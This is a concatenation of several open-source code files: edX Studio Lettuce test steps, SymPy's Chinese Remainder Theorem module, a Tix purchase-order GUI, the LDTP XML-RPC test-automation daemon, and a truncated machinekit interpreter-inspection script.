from logging import getLogger
from student.tests.factories import AdminFactory
from student import auth
logger = getLogger(__name__)
from terrain.browser import reset_data
TEST_ROOT = settings.COMMON_TEST_DATA_ROOT
@step('I (?:visit|access|open) the Studio homepage$')
def i_visit_the_studio_homepage(_step):
# To make this go to port 8001, put
# LETTUCE_SERVER_PORT = 8001
# in your settings.py file.
world.visit('/')
signin_css = 'a.action-signin'
assert world.is_css_present(signin_css)
@step('I am logged into Studio$')
def i_am_logged_into_studio(_step):
log_into_studio()
@step('I confirm the alert$')
def i_confirm_with_ok(_step):
world.browser.get_alert().accept()
@step(u'I press the "([^"]*)" delete icon$')
def i_press_the_category_delete_icon(_step, category):
if category == 'section':
css = 'a.action.delete-section-button'
elif category == 'subsection':
css = 'a.action.delete-subsection-button'
else:
assert False, 'Invalid category: %s' % category
world.css_click(css)
@step('I have opened a new course in Studio$')
def i_have_opened_a_new_course(_step):
open_new_course()
@step('I have populated a new course in Studio$')
def i_have_populated_a_new_course(_step):
world.clear_courses()
course = world.CourseFactory.create()
world.scenario_dict['COURSE'] = course
section = world.ItemFactory.create(parent_location=course.location)
world.ItemFactory.create(
parent_location=section.location,
category='sequential',
display_name='Subsection One',
)
user = create_studio_user(is_staff=False)
add_course_author(user, course)
log_into_studio()
world.css_click('a.course-link')
world.wait_for_js_to_load()
@step('(I select|s?he selects) the new course')
def select_new_course(_step, whom):
course_link_css = 'a.course-link'
world.css_click(course_link_css)
@step(u'I press the "([^"]*)" notification button$')
def press_the_notification_button(_step, name):
# Because the notification uses a CSS transition,
# Selenium will always report it as being visible.
# This makes it very difficult to successfully click
# the "Save" button at the UI level.
# Instead, we use JavaScript to reliably click
# the button.
btn_css = 'div#page-notification button.action-%s' % name.lower()
world.trigger_event(btn_css, event='focus')
world.browser.execute_script("$('{}').click()".format(btn_css))
world.wait_for_ajax_complete()
@step('I change the "(.*)" field to "(.*)"$')
def i_change_field_to_value(_step, field, value):
field_css = '#%s' % '-'.join([s.lower() for s in field.split()])
ele = world.css_find(field_css).first
ele.fill(value)
ele._element.send_keys(Keys.ENTER)
@step('I reset the database')
def reset_the_db(_step):
"""
When running Lettuce tests using examples (i.e. "Confirmation is
shown on save" in course-settings.feature), the normal hooks
aren't called between examples. reset_data should run before each
scenario to flush the test database. When this doesn't happen we
get errors due to trying to insert a non-unique entry. So instead,
we delete the database manually. This has the effect of removing
any users and courses that have been created during the test run.
"""
reset_data(None)
@step('I see a confirmation that my changes have been saved')
def i_see_a_confirmation(step):
confirmation_css = '#alert-confirmation'
assert world.is_css_present(confirmation_css)
def open_new_course():
world.clear_courses()
create_studio_user()
log_into_studio()
create_a_course()
def create_studio_user(
uname='robot',
email='[email protected]',
password='test',
is_staff=False):
studio_user = world.UserFactory(
username=uname,
email=email,
password=password,
is_staff=is_staff)
registration = world.RegistrationFactory(user=studio_user)
registration.register(studio_user)
registration.activate()
return studio_user
def fill_in_course_info(
name='Robot Super Course',
org='MITx',
num='101',
run='2013_Spring'):
world.css_fill('.new-course-name', name)
world.css_fill('.new-course-org', org)
world.css_fill('.new-course-number', num)
world.css_fill('.new-course-run', run)
def log_into_studio(
uname='robot',
email='[email protected]',
password='test',
name='Robot Studio'):
world.log_in(username=uname, password=password, email=email, name=name)
# Navigate to the studio dashboard
world.visit('/')
assert_in(uname, world.css_text('span.account-username', timeout=10))
def add_course_author(user, course):
"""
Add the user to the instructor group of the course
so they will have the permissions to see it in studio
"""
global_admin = AdminFactory()
for role in (CourseStaffRole, CourseInstructorRole):
auth.add_users(global_admin, role(course.id), user)
def create_a_course():
course = world.CourseFactory.create(org='MITx', course='999', display_name='Robot Super Course')
world.scenario_dict['COURSE'] = course
user = world.scenario_dict.get("USER")
if not user:
user = get_user('[email protected]')
add_course_author(user, course)
# Navigate to the studio dashboard
world.visit('/')
course_link_css = 'a.course-link'
world.css_click(course_link_css)
course_title_css = 'span.course-title'
assert_true(world.is_css_present(course_title_css))
def add_section():
world.css_click('.outline .button-new')
assert_true(world.is_css_present('.outline-section .xblock-field-value'))
def set_date_and_time(date_css, desired_date, time_css, desired_time, key=None):
set_element_value(date_css, desired_date, key)
world.wait_for_ajax_complete()
set_element_value(time_css, desired_time, key)
world.wait_for_ajax_complete()
def set_element_value(element_css, element_value, key=None):
element = world.css_find(element_css).first
element.fill(element_value)
# hit TAB or provided key to trigger save content
if key is not None:
element._element.send_keys(getattr(Keys, key)) # pylint: disable=protected-access
else:
element._element.send_keys(Keys.TAB) # pylint: disable=protected-access
@step('I have enabled the (.*) advanced module$')
def i_enabled_the_advanced_module(step, module):
step.given('I have opened a new course section in Studio')
world.css_click('.nav-course-settings')
world.css_click('.nav-course-settings-advanced a')
type_in_codemirror(0, '["%s"]' % module)
press_the_notification_button(step, 'Save')
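# Hedged example (not part of the original file): the step above would be
# exercised from a .feature scenario with a line such as
#
#     Given I have enabled the combinedopenended advanced module
#
# where the captured group becomes the `module` argument.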
@world.absorb
def create_unit_from_course_outline():
"""
Expands the section and clicks on the New Unit link.
The end result is the page where the user is editing the new unit.
"""
css_selectors = [
'.outline-subsection .expand-collapse', '.outline-subsection .button-new'
]
for selector in css_selectors:
world.css_click(selector)
world.wait_for_mathjax()
world.wait_for_xmodule()
world.wait_for_loading()
assert world.is_css_present('ul.new-component-type')
@world.absorb
def wait_for_loading():
"""
Waits for the loading indicator to be hidden.
"""
world.wait_for(lambda _driver: len(world.browser.find_by_css('div.ui-loading.is-hidden')) > 0)
@step('I have clicked the new unit button$')
@step(u'I am in Studio editing a new unit$')
def edit_new_unit(step):
step.given('I have populated a new course in Studio')
create_unit_from_course_outline()
@step('the save notification button is disabled')
def save_button_disabled(step):
button_css = '.action-save'
disabled = 'is-disabled'
assert world.css_has_class(button_css, disabled)
@step('the "([^"]*)" button is disabled')
def button_disabled(step, value):
button_css = 'input[value="%s"]' % value
assert world.css_has_class(button_css, 'is-disabled')
def _do_studio_prompt_action(intent, action):
"""
Wait for a studio prompt to appear and press the specified action button
See common/js/components/views/feedback_prompt.js for implementation
"""
assert intent in [
'warning',
'error',
'confirmation',
'announcement',
'step-required',
'help',
'mini',
]
assert action in ['primary', 'secondary']
world.wait_for_present('div.wrapper-prompt.is-shown#prompt-{}'.format(intent))
action_css = 'li.nav-item > button.action-{}'.format(action)
world.trigger_event(action_css, event='focus')
world.browser.execute_script("$('{}').click()".format(action_css))
world.wait_for_ajax_complete()
world.wait_for_present('div.wrapper-prompt.is-hiding#prompt-{}'.format(intent))
@world.absorb
def confirm_studio_prompt():
_do_studio_prompt_action('warning', 'primary')
@step('I confirm the prompt')
def confirm_the_prompt(step):
confirm_studio_prompt()
@step(u'I am shown a prompt$')
def i_am_shown_a_notification(step):
assert world.is_css_present('.wrapper-prompt')
def type_in_codemirror(index, text, find_prefix="$"):
script = """
var cm = {find_prefix}('div.CodeMirror:eq({index})').get(0).CodeMirror;
cm.getInputField().focus();
cm.setValue(arguments[0]);
cm.getInputField().blur();""".format(index=index, find_prefix=find_prefix)
world.browser.driver.execute_script(script, str(text))
world.wait_for_ajax_complete()
def get_codemirror_value(index=0, find_prefix="$"):
return world.browser.driver.execute_script(
"""
return {find_prefix}('div.CodeMirror:eq({index})').get(0).CodeMirror.getValue();
""".format(index=index, find_prefix=find_prefix)
)
def attach_file(filename, sub_path):
path = os.path.join(TEST_ROOT, sub_path, filename)
world.browser.execute_script("$('input.file-input').css('display', 'block')")
assert_true(os.path.exists(path))
world.browser.attach_file('file', os.path.abspath(path))
def upload_file(filename, sub_path=''):
# The file upload dialog is a faux modal, a div that takes over the display
attach_file(filename, sub_path)
modal_css = 'div.wrapper-modal-window-assetupload'
button_css = '{} .action-upload'.format(modal_css)
world.css_click(button_css)
# Clicking the Upload button triggers an AJAX POST.
world.wait_for_ajax_complete()
# The modal stays up with a "File uploaded succeeded" confirmation message, then goes away.
# It should take under 2 seconds, so wait up to 10.
# Note that is_css_not_present will return as soon as the element is gone.
assert world.is_css_not_present(modal_css, wait_time=10)
@step(u'"([^"]*)" logs in$')
def other_user_login(step, name):
step.given('I log out')
world.visit('/')
signin_css = 'a.action-signin'
world.is_css_present(signin_css)
world.css_click(signin_css)
def fill_login_form():
login_form = world.browser.find_by_css('form#login_form')
login_form.find_by_name('email').fill(name + '@edx.org')
login_form.find_by_name('password').fill("test")
login_form.find_by_name('submit').click()
world.retry_on_exception(fill_login_form)
assert_true(world.is_css_present('.new-course-button'))
world.scenario_dict['USER'] = get_user(name + '@edx.org')
@step(u'the user "([^"]*)" exists( as a course (admin|staff member|is_staff))?$')
def create_other_user(_step, name, has_extra_perms, role_name):
email = name + '@edx.org'
user = create_studio_user(uname=name, password="test", email=email)
if has_extra_perms:
if role_name == "is_staff":
GlobalStaff().add_users(user)
else:
if role_name == "admin":
# admins get staff privileges, as well
roles = (CourseStaffRole, CourseInstructorRole)
else:
roles = (CourseStaffRole,)
course_key = world.scenario_dict["COURSE"].id
global_admin = AdminFactory()
for role in roles:
auth.add_users(global_admin, role(course_key), user)
@step('I log out')
def log_out(_step):
world.visit('logout')
| agpl-3.0 |
rahuldan/sympy | sympy/ntheory/modular.py | 108 | 7676 | from __future__ import print_function, division
from sympy.core.numbers import igcdex, igcd
from sympy.core.mul import prod
from sympy.core.compatibility import as_int, reduce
from sympy.ntheory.primetest import isprime
from sympy.polys.domains import ZZ
from sympy.polys.galoistools import gf_crt, gf_crt1, gf_crt2
def symmetric_residue(a, m):
"""Return the residual mod m such that it is within half of the modulus.
>>> from sympy.ntheory.modular import symmetric_residue
>>> symmetric_residue(1, 6)
1
>>> symmetric_residue(4, 6)
-2
"""
if a <= m // 2:
return a
return a - m
def crt(m, v, symmetric=False, check=True):
r"""Chinese Remainder Theorem.
The moduli in m are assumed to be pairwise coprime. The output
is then an integer f, such that f = v_i mod m_i for each pair out
of v and m. If ``symmetric`` is False a positive integer will be
returned, else \|f\| will be less than or equal to the LCM of the
moduli, and thus f may be negative.
If the moduli are not co-prime the correct result will be returned
if/when the test of the result is found to be incorrect. This result
will be None if there is no solution.
The keyword ``check`` can be set to False if it is known that the moduli
are coprime.
As an example consider a set of residues ``U = [49, 76, 65]``
and a set of moduli ``M = [99, 97, 95]``. Then we have::
>>> from sympy.ntheory.modular import crt, solve_congruence
>>> crt([99, 97, 95], [49, 76, 65])
(639985, 912285)
This is the correct result because::
>>> [639985 % m for m in [99, 97, 95]]
[49, 76, 65]
If the moduli are not co-prime, you may receive an incorrect result
if you use ``check=False``:
>>> crt([12, 6, 17], [3, 4, 2], check=False)
(954, 1224)
>>> [954 % m for m in [12, 6, 17]]
[6, 0, 2]
>>> crt([12, 6, 17], [3, 4, 2]) is None
True
>>> crt([3, 6], [2, 5])
(5, 6)
Note: the order of gf_crt's arguments is reversed relative to crt,
and that solve_congruence takes residue, modulus pairs.
Programmer's note: rather than checking that all pairs of moduli share
no GCD (an O(n**2) test) and rather than factoring all moduli and seeing
that there is no factor in common, a check that the result gives the
indicated residuals is performed -- an O(n) operation.
See Also
========
solve_congruence
sympy.polys.galoistools.gf_crt : low level crt routine used by this routine
"""
if check:
m = list(map(as_int, m))
v = list(map(as_int, v))
result = gf_crt(v, m, ZZ)
mm = prod(m)
if check:
if not all(v % m == result % m for v, m in zip(v, m)):
result = solve_congruence(*list(zip(v, m)),
check=False, symmetric=symmetric)
if result is None:
return result
result, mm = result
if symmetric:
return symmetric_residue(result, mm), mm
return result, mm
def crt1(m):
"""First part of Chinese Remainder Theorem, for multiple application.
Examples
========
>>> from sympy.ntheory.modular import crt1
>>> crt1([18, 42, 6])
(4536, [252, 108, 756], [0, 2, 0])
"""
return gf_crt1(m, ZZ)
def crt2(m, v, mm, e, s, symmetric=False):
"""Second part of Chinese Remainder Theorem, for multiple application.
Examples
========
>>> from sympy.ntheory.modular import crt1, crt2
>>> mm, e, s = crt1([18, 42, 6])
>>> crt2([18, 42, 6], [0, 0, 0], mm, e, s)
(0, 4536)
"""
result = gf_crt2(v, m, mm, e, s, ZZ)
if symmetric:
return symmetric_residue(result, mm), mm
return result, mm
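# A small illustrative sketch (added here, not part of the original doctests)
# of how crt1/crt2 pair up in practice: precompute (mm, e, s) once for a fixed
# set of co-prime moduli, then reuse it for any residue vector over those
# moduli. The numbers reuse the crt() example above, so the expected output
# follows from that docstring rather than from a new claim.
#
#     >>> from sympy.ntheory.modular import crt1, crt2
#     >>> mm, e, s = crt1([99, 97, 95])
#     >>> crt2([99, 97, 95], [49, 76, 65], mm, e, s)
#     (639985, 912285)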
def solve_congruence(*remainder_modulus_pairs, **hint):
"""Compute the integer ``n`` that has the residual ``ai`` when it is
divided by ``mi`` where the ``ai`` and ``mi`` are given as pairs to
this function: ((a1, m1), (a2, m2), ...). If there is no solution,
return None. Otherwise return ``n`` and its modulus.
The ``mi`` values need not be co-prime. If it is known that the moduli are
not co-prime then the hint ``check`` can be set to False (default=True) and
the check for a quicker solution via crt() (valid when the moduli are
co-prime) will be skipped.
If the hint ``symmetric`` is True (default is False), the value of ``n``
will be within 1/2 of the modulus, possibly negative.
Examples
========
>>> from sympy.ntheory.modular import solve_congruence
What number is 2 mod 3, 3 mod 5 and 2 mod 7?
>>> solve_congruence((2, 3), (3, 5), (2, 7))
(23, 105)
>>> [23 % m for m in [3, 5, 7]]
[2, 3, 2]
If you prefer to work with all remainder in one list and
all moduli in another, send the arguments like this:
>>> solve_congruence(*zip((2, 3, 2), (3, 5, 7)))
(23, 105)
The moduli need not be co-prime; in this case there may or
may not be a solution:
>>> solve_congruence((2, 3), (4, 6)) is None
True
>>> solve_congruence((2, 3), (5, 6))
(5, 6)
The symmetric flag will make the result be within 1/2 of the modulus:
>>> solve_congruence((2, 3), (5, 6), symmetric=True)
(-1, 6)
See Also
========
crt : high level routine implementing the Chinese Remainder Theorem
"""
def combine(c1, c2):
"""Return the tuple (a, m) which satisfies the requirement
        that n = a + i*m satisfy n = a1 + j*m1 and n = a2 + k*m2.
References
==========
- http://en.wikipedia.org/wiki/Method_of_successive_substitution
"""
a1, m1 = c1
a2, m2 = c2
a, b, c = m1, a2 - a1, m2
g = reduce(igcd, [a, b, c])
a, b, c = [i//g for i in [a, b, c]]
if a != 1:
inv_a, _, g = igcdex(a, c)
if g != 1:
return None
b *= inv_a
a, m = a1 + m1*b, m1*c
return a, m
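    # A worked instance of the substitution above (illustrative only, using the
    # doctest pairs (2, 3) and (3, 5)): a, b, c start as 3, 1, 5 with g = 1;
    # since a != 1, igcdex(3, 5) gives inv_a = 2, so b becomes 2 and the
    # combined congruence is a = 2 + 3*2 = 8 with modulus m = 3*5 = 15 --
    # and indeed 8 % 3 == 2 and 8 % 5 == 3.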
rm = remainder_modulus_pairs
symmetric = hint.get('symmetric', False)
if hint.get('check', True):
rm = [(as_int(r), as_int(m)) for r, m in rm]
# ignore redundant pairs but raise an error otherwise; also
# make sure that a unique set of bases is sent to gf_crt if
# they are all prime.
#
# The routine will work out less-trivial violations and
# return None, e.g. for the pairs (1,3) and (14,42) there
# is no answer because 14 mod 42 (having a gcd of 14) implies
# (14/2) mod (42/2), (14/7) mod (42/7) and (14/14) mod (42/14)
# which, being 0 mod 3, is inconsistent with 1 mod 3. But to
# preprocess the input beyond checking of another pair with 42
# or 3 as the modulus (for this example) is not necessary.
uniq = {}
for r, m in rm:
r %= m
if m in uniq:
if r != uniq[m]:
return None
continue
uniq[m] = r
rm = [(r, m) for m, r in uniq.items()]
del uniq
# if the moduli are co-prime, the crt will be significantly faster;
# checking all pairs for being co-prime gets to be slow but a prime
# test is a good trade-off
if all(isprime(m) for r, m in rm):
r, m = list(zip(*rm))
return crt(m, r, symmetric=symmetric, check=False)
rv = (0, 1)
for rmi in rm:
rv = combine(rv, rmi)
if rv is None:
break
n, m = rv
n = n % m
else:
if symmetric:
return symmetric_residue(n, m), m
return n, m
| bsd-3-clause |
Ripley6811/TAIMAU | src/frames/po/prodselectf.py | 1 | 12013 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import Tix
import tkMessageBox
from utils import settings
from utils import calendar_tixradiobutton as date_picker
from utils.symbols import U_TOOLS, U_TRUCK
def main(_):
"""List products for creating orders.
    Enter prices and order amounts and save either as a multiple-shipment order
    (added to the open PO list) or as a one-time order."""
frame = Tix.Frame(_.po_frame)
prodf = Tix.Frame(frame)
prodf.pack(side='left', anchor='n')
#XXX: Or use grid with column weighting
# Register validation methods to this frame.
prefix = u'$'
def is_float(val):
try:
float(val[1:])
except:
return True if val == prefix else False
return True
vcmd_float = frame.register(lambda x: is_float(x))
vcmd_int = frame.register(lambda x: x.isdigit())
prodrecs = []
_priceSV = [] # Store stringvar for entered prices
_qtySV = [] # Store stringvar for entered quantity
# font = (_.font, 12, 'bold')
col_default = frame.cget("bg")
def refresh():
for child in prodf.winfo_children():
child.destroy()
prodrecs.__delslice__(0,1000) # Store product records
_priceSV.__delslice__(0,1000) # Store stringvar for entered prices
_qtySV.__delslice__(0,1000) # Store stringvar for entered quantity
cog = None # Current cogroup
scm = None # Current 's' or 'c' mode (supplier or customer view)
try:
cog = _.curr.cogroup
scm = _.sc_mode
except KeyError:
return
# Retrieve user designated PO ordering if it exists.
minlen = 100
rows = settings.load().get(scm, {}).get(cog.name, range(minlen))
# Increase 'rows' length in case more prod are added.
#XXX: Possibly unnecessary. Refresh if new products added.
if len(rows) < minlen:
rows = rows + range(max(rows)+1, max(rows)+minlen-len(rows))
# Get list of product records.
query = _.dbm.session.query(_.dbm.Product)
query = query.filter_by(group = cog.name)
query = query.filter_by(discontinued = False)
query = query.filter_by(is_supply=True if scm == u's' else False)
query = query.order_by('inventory_name')
[prodrecs.append(p) for p in query.all()]
# Set default options for all widgets.
OPTS = dict(master=prodf, justify="right")#, font=font)
# Set entry widget defaults
Eopts = dict(width=8, bg=u"moccasin", validate='key', **OPTS)
_unitsVars = []
_multiplier = [] # Convert SKU to units
for row, PR in zip(rows, prodrecs):
col = 0
PrU = PR.UM if PR.unitpriced else PR.SKU
w = [] # Container for one line of widgets
# Product name and specs
w.append(Tix.Label(text=PR.name, **OPTS))
w[-1].grid(row=row, column=col, sticky='nsw'); col += 1
w.append(Tix.Label(text=PR.specs, padx=20, **OPTS))
w[-1].grid(row=row, column=col, sticky='nsw'); col += 1
# Price entry
_priceSV.append(Tix.StringVar())
_priceSV[-1].set(u'{}{}'.format(prefix, PR.price))
w.append(Tix.Entry(textvariable=_priceSV[-1],
validatecommand=(vcmd_float, '%P'), **Eopts))
w[-1].grid(row=row, column=col); col += 1
# TWD per sku/unit
w.append(Tix.Label(text=u'/{}'.format(PrU), padx=10, **OPTS))
w[-1].grid(row=row, column=col, sticky='nsw'); col += 1
# Number of units entry
_qtySV.append(Tix.StringVar())
w.append(Tix.Entry(textvariable=_qtySV[-1],
validatecommand=(vcmd_int, '%S'), **Eopts))
w[-1].grid(row=row, column=col); col += 1
# Show SKU after quantity number
text = PR.SKU
if text == u'槽車':
text = PrU
w.append(Tix.Label(text=text, padx=10, **OPTS))
w[-1].grid(row=row, column=col, sticky='nsw'); col += 1
def highlightrow(qtyi, widgets):
val = _qtySV[qtyi].get()
new_color = u'PaleTurquoise1' if len(val) else u'moccasin'
for widget in widgets:
if isinstance(widget, Tix.Entry):
widget.config(bg=new_color)
widgets[0].config(relief='raised' if len(val) else 'flat',
bg='lawngreen' if len(val) else col_default)
# Fill in total units reference
if _qtySV[qtyi].get().isdigit():
_int = int(_qtySV[qtyi].get())*_multiplier[qtyi]
# _poBs[qtyi].config(bg=u'PaleTurquoise1')
if _int.is_integer():
_int = int(_int)
_unitsVars[qtyi].set(u"{}".format(_int))
else:
# _poBs[row].config(bg=u'moccasin')
_unitsVars[qtyi].set(u"{}".format(0))
_qtySV[-1].trace('w', lambda a,b,c,i=len(_qtySV)-1, w=w:
highlightrow(i, w))
# Total units StringVar
_unitsVars.append(Tix.StringVar())
_multiplier.append(PR.units)
lw = Tix.Label(textvariable=_unitsVars[-1],
anchor='e', bg=u'LightGoldenrod1', **OPTS)
lw.grid(row=row, column=col, sticky='e'); col += 1
_unitsVars[-1].set("0")
_text = u' {}'.format(
PR.UM #if _prod.unitpriced else _prod.SKU
)
lw = Tix.Label(text=_text,
anchor='w', bg=u'LightGoldenrod1', **OPTS)
lw.grid(row=row, column=col, sticky='w'); col += 1
# Form creation panel. Make different types of POs.
formf = Tix.Frame(frame)
formf.pack(side='top', anchor='n')
ponSV = Tix.StringVar() # PO number
manSV = Tix.StringVar() # Manifest number
#TODO: Add Taimau branch selection
# Order date: preselect today
tl = Tix.Label(formf, textvariable=_.loc(u"Date of order/shipment"))
tl.grid(row=0, columnspan=1)
cal = date_picker.Calendar(formf, padx=5,
preweeks=3, postweeks=2, settoday=True)
cal.grid(row=1, columnspan=1, sticky='n')
# Order date: preselect today
tl = Tix.Label(formf, textvariable=_.loc(u"Order due date"))
tl.grid(row=0, column=1)
caldue = date_picker.Calendar(formf, padx=5, preweeks=3, postweeks=2)
caldue.grid(row=1, column=1, sticky='n')
Tix.Label(formf, textvariable=_.loc(u'Order (PO) #:'), pady=10)\
.grid(row=2, column=0, sticky='nsew')
ponEntry = Tix.Entry(formf, textvariable=ponSV, bg=u"moccasin")
ponEntry.grid(row=2, column=1, sticky='ew')
Tix.Label(formf, textvariable=_.loc(u'Manifest #:'), pady=10)\
.grid(row=3, column=0, sticky='nsew')
manEntry = Tix.Entry(formf, textvariable=manSV, bg=u"moccasin")
manEntry.grid(row=3, column=1, sticky='ew')
def createOrder(PROD, PRICE, QTY, is_open=True):
'''
PROD : Product object
PRICE : float
QTY : integer
'''
MPN = PROD.MPN
PRICE = float(PRICE.replace('$',''))
QTY = int(QTY)
if PRICE != PROD.curr_price:
PROD.curr_price = PRICE
ins = dict(MPN=MPN,
qty=QTY,
price=PRICE,
orderID=ponSV.get().upper(),
orderdate=cal.date_obj,
is_open=is_open,
ordernote=u'', #TODO:
applytax=True) #TODO:
if caldue.date_str:
ins['duedate'] = caldue.date_obj
ins['is_sale'] = True if _.sc_mode == 'c' else False
ins['is_purchase'] = True if _.sc_mode == 's' else False
ins['group'] = _.curr.cogroup.name
ins['seller'] = u'台茂' if _.sc_mode == 'c' else _.curr.branchSV.get()
ins['buyer'] = u'台茂' if _.sc_mode == 's' else _.curr.branchSV.get()
if _.debug:
print ins
return _.dbm.Order(**ins)
def createShipmentItem(order, manifest, QTY):
'''
new_order : Order object
manifest : Shipment object
QTY : integer
'''
QTY = int(QTY)
return _.dbm.ShipmentItem(
order = order,
shipment = manifest,
qty = QTY,
)
def submitPO(*args):
'''Add new POs for each item with user defined quantities.'''
if confirm_entries():
for PROD, PRICE, QTY in zip(prodrecs, _priceSV, _qtySV):
if QTY.get().isdigit() and len(PRICE.get()) > 1:
new_order = createOrder(PROD, PRICE.get(), QTY.get())
_.dbm.session.add(new_order)
_.dbm.session.commit()
refresh()
try:
_.load_company()
except AttributeError:
pass
def submitMF(*args):
'''Add new POs and manifest for all items with defined quantities.
Set POs as inactive (single-use).'''
if len([1 for Q in _qtySV if Q.get().isdigit()]) > 5 and _.sc_mode == 'c':
title = u'Too many items.'
message = u'Each manifest can only have five items.'
tkMessageBox.showerror(title, message)
return
if confirm_entries():
manifest = _.dbm.existing_shipment(manSV.get(),
cal.date_obj,
_.curr.cogroup.name)
if not manifest:
manifest = _.dbm.Shipment(
shipmentdate = cal.date_obj,
shipment_no = manSV.get().upper(),
# shipmentnote = ,
# driver = ,
# truck = ,
)
for PROD, PRICE, QTY in zip(prodrecs, _priceSV, _qtySV):
if QTY.get().isdigit() and len(PRICE.get()) > 1:
new_order = createOrder(PROD, PRICE.get(), QTY.get(), is_open=False)
item = createShipmentItem(new_order, manifest, QTY.get())
_.dbm.session.add(item)
_.dbm.session.commit()
try:
_.load_company()
except AttributeError:
pass
po_button = Tix.Button(formf, textvariable=_.loc(U_TOOLS+u" Create Product Order (PO)"),
pady=12, bg=u'lawngreen', command=submitPO)
po_button.grid(row=4, column=0, sticky='nsew')
def toggle_po_button(*args):
if manSV.get():
po_button['state'] = 'disabled'
else:
po_button['state'] = 'normal'
manSV.trace('w', toggle_po_button)
Tix.Button(formf, textvariable=_.loc(U_TRUCK+u" Create Single Shipment PO"),
pady=12, bg=u'lawngreen', command=submitMF).grid(row=4, column=1, sticky='nsew')
def confirm_entries():
title = u'Confirm entries'
message = _.loc(u'Verify these entries:',1)
message += u'\n\n日期 : {}'.format(cal.date_str)
message += u'\n分司 : {}'.format(_.curr.branchSV.get())
message += u'\n訂單#: {}'.format(ponSV.get())
message += u'\n出貨#: {}'.format(manSV.get())
for PROD, PRICE, QTY in zip(prodrecs, _priceSV, _qtySV):
if len(QTY.get()) > 0:
message += u'\n\t{}{} {} @ {}/{}'.format(
QTY.get(), PROD.UM if PROD.SKU==u'槽車' else PROD.SKU,
PROD.name,
PRICE.get(), PROD.PrMeas,
)
return tkMessageBox.askokcancel(title, message)
_.prodselectf = frame
_.prodselectf.refresh = refresh
try:
_.refresh.append(refresh)
except KeyError:
_.refresh = [refresh,]
return frame
| gpl-2.0 |
ldtp/ldtp2 | ldtpd/xmlrpc_daemon.py | 3 | 4888 | """
LDTP v2 xml rpc daemon.
@author: Eitan Isaacson <[email protected]>
@author: Nagappan Alagappan <[email protected]>
@copyright: Copyright (c) 2009 Eitan Isaacson
@copyright: Copyright (c) 2009-13 Nagappan Alagappan
@license: LGPL
http://ldtp.freedesktop.org
This file may be distributed and/or modified under the terms of the GNU Lesser General
Public License version 2 as published by the Free Software Foundation. This file
is distributed without any warranty; without even the implied warranty of
merchantability or fitness for a particular purpose.
See "COPYING" in the source distribution for more information.
Headers in this file shall remain intact.
"""
import os
import re
import time
import core
from core import Ldtpd
from twisted.web import xmlrpc
import xmlrpclib
from log import logger
if 'LDTP_COMMAND_DELAY' in os.environ:
delay = os.environ['LDTP_COMMAND_DELAY']
else:
delay = None
_ldtp_debug = os.environ.get('LDTP_DEBUG', None)
_ldtp_debug_file = os.environ.get('LDTP_DEBUG_FILE', None)
class XMLRPCLdtpd(Ldtpd, xmlrpc.XMLRPC, object):
def __new__(cls, *args, **kwargs):
for symbol in dir(Ldtpd):
if symbol.startswith('_'):
continue
obj = getattr(cls, symbol)
if not callable(obj):
continue
setattr(cls, 'xmlrpc_'+symbol, obj)
return object.__new__(cls, *args, **kwargs)
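    # The aliasing above means every public Ldtpd method is also reachable
    # under an ``xmlrpc_``-prefixed name, which is the naming convention
    # twisted's XML-RPC dispatcher looks up -- e.g. a public method named
    # ``getapplist`` would also become ``xmlrpc_getapplist`` (method name
    # used here purely as an illustration).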
def __init__(self):
xmlrpc.XMLRPC.__init__(self, allowNone = True)
Ldtpd.__init__(self)
def _listFunctions(self):
return [a[7:] for a in \
filter(lambda x: x.startswith('xmlrpc_'), dir(self))]
# Starting twisted 11.1
listProcedures = _listFunctions
if not _ldtp_debug:
# If LDTP_DEBUG env set, then print verbose info on console
def _ebRender(self, failure):
"""Custom error render method (used by our XMLRPC objects)"""
if isinstance(failure.value, xmlrpclib.Fault):
return failure.value
if hasattr(failure, 'getErrorMessage'):
value = failure.getErrorMessage()
else:
value = 'error'
return xmlrpclib.Fault(self.FAILURE, value)
def render_POST(self, request):
request.content.seek(0, 0)
request.setHeader("content-type", "text/xml")
try:
args, functionPath = xmlrpclib.loads(request.content.read())
if args and isinstance(args[-1], dict):
# Passing args and kwargs to _ldtp_callback
# fail, so using self, kind of work around !
kwargs = args[-1]
args = args[:-1]
if delay or self._delaycmdexec:
pattern = '(wait|exist|has|get|verify|enabled|'
pattern += 'launch|image|system)'
p = re.compile(pattern)
if not p.search(functionPath):
# Sleep for 1 second, else the at-spi-registryd dies,
# on the speed we execute
try:
if self._delaycmdexec:
self.wait(float(self._delaycmdexec))
else:
self.wait(float(delay))
except ValueError:
time.sleep(0.5)
else:
kwargs = {}
except Exception as e:
f = xmlrpc.Fault(
self.FAILURE, "Can't deserialize input: %s" % (e,))
self._cbRender(f, request)
else:
try:
if hasattr(self, 'lookupProcedure'):
# Starting twisted 11.1
function = self.lookupProcedure(functionPath)
else:
function = self._getFunction(functionPath)
except xmlrpc.Fault as f:
self._cbRender(f, request)
else:
if _ldtp_debug:
debug_st = '%s(%s)' % \
(functionPath,
', '.join(map(repr, args) + \
['%s=%s' % (k, repr(v)) \
for k, v in kwargs.items()]))
print(debug_st)
logger.debug(debug_st)
if _ldtp_debug_file:
with open(_ldtp_debug_file, "a") as fp:
fp.write(debug_st)
xmlrpc.defer.maybeDeferred(function, *args,
**kwargs).\
addErrback(self._ebRender).\
addCallback(self._cbRender,
request)
return xmlrpc.server.NOT_DONE_YET
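# A rough client-side sketch of exercising this daemon (not part of the
# module; the port number is an assumption -- LDTP has traditionally listened
# on 4118 -- and the method name is only illustrative):
#
#     import xmlrpclib
#     client = xmlrpclib.ServerProxy('http://localhost:4118/')
#     print(client.getapplist())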
| lgpl-2.1 |
RunningLight/machinekit | configs/sim/axis/remap/iocontrol-removed/python/embedding.py | 28 | 1709 | # a tour of accessing interpreter internals
def call_stack(self,*args):
print "------- interpreter call stack: "
for i in range(self.call_level):
s = self.sub_context[i]
print "%d: position=%d sequence_number=%d filename=%s subname=%s context_status=%x" % (i, s.position, s.sequence_number,s.filename,s.subname,s.context_status),
print "named_params=",s.named_params
def remap_stack(self, *args):
print "------- interpreter remap stack: "
for i in range(self.remap_level):
r = self.blocks[i].executing_remap
print "%d: name=%s argspec=%s prolog_func=%s ngc=%s py=%s epilog=%s modal_group=%d" % (r.name,r.argspec,r.prolog_func,r.ngc,r.epilog_func,r.modal_group)
def tooltable(self, *args):
print "------- tool table:"
for i in range(len(self.tool_table)):
t = self.tool_table[i]
if t.toolno != -1: print str(t)
print "tool in spindle=%d pocketPrepped=%d" % (self.current_tool,self.selected_pocket)
def show_block(self,*args):
